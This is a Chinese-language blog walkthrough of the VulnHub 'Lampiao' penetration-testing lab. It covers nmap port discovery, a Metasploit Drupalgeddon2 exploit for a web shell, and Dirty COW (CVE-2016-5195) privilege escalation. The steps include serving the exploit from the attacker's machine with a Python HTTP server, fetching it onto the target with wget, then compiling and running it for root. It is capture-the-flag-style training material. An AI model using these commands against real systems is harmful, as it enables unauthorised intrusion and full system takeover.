渗透测试之靶机试炼(五)

靶机简介

靶机地址:
https://download.vulnhub.com/lampiao/Lampiao.zip

运行环境:
VirtualBox

攻击测试机环境
kali
win 10

工具简介
msf
dirb
nmap
python

靶机网卡设置

三台虚拟主机在同一局域网即可
作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。
在这里插入图片描述

信息收集

这个靶机坑比较多,信息收集过程中找到许多看似有用信息,但是并没用利用成功,如有其它人找到其它方法可以留言交流一下。
老规矩,nmap主机发现:
命令:nmap 10.211.55.0/24
在这里插入图片描述只发现了22端口,进行了ssh爆破,无果,重新扫描一次全端口。
命令:nmap 10.211.55.28 -p1-65535 -v -A
在这里插入图片描述发现端口1898 访问
在这里插入图片描述之后在web页面是上实验好久,注入,爆破都没成功,不过在目录爆破发现一个robots.txt文件 查看
在这里插入图片描述挨个看了一遍,发现这个日志文件
在这里插入图片描述是drupal的更新日志文件,这里最后的更新时间的2017年2月1日版本是7.54,直接在kalI的maf上查找exp
命令 mafconsole
search drupal
在这里插入图片描述找到一个2018年更新的exp,使用改exp,设置目标ip和目标端口,如果不熟悉这个exp,可以使用info命令查看所需参数。
命令 use exploit/unix/webapp/drupal_drupalgeddon2
在这里插入图片描述设置好参数,执行exp
在这里插入图片描述执行成功,获取到一个回话,这里我们直接用这个回话建立一个交互式shell
命令 shell
python -c ‘import pty; pty.spawn("/bin/bash")’
在这里插入图片描述

提权

拿到shell后就是提权了,作者对提权不是很熟悉,所以踏了许多的坑,其实有点经验的查看一下系统内核就可以知道怎么提权了,不废话了,查看系统版本及内核。
命令 cat /proc/version
在这里插入图片描述最后经过作者一系列测试,最后使用脏牛提权成功CVE-2016-5195
找了好几个exp,只有这个成功了,作者菜逼,大佬自由选择
exp:https://github.com/gbonacini/CVE-2016-5195
这个靶机没有git命令,所以只能在本地下载,然后打包上传到服务器上
下载命令 git clone https://github.com/gbonacini/CVE-2016-5195
在这里插入图片描述打包该文件夹
命令 tar -zcvf /root/123.tar CVE-2016-5195/
在这里插入图片描述使用python开启一个web服务,供靶机下载该文件
命令 python -m SimpleHTTPServer 8888
在这里插入图片描述
靶机利用获得shell进行下载
命令 wget http://10.211.55.8:8888/123.tar
在这里插入图片描述如图,已经将该文件下载到靶机上,接下来解压
命令: tar -zxvf /var/www/html/123.tar
在这里插入图片描述解压成功后,进入该目录
命令 cd CVE-2016-5195
在这里插入图片描述然后对该文件进行编译
命令 make
在这里插入图片描述生成可执行文件 dcow 利用他进行提权
命令 ./dcow -s
在这里插入图片描述获取到root权限。

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值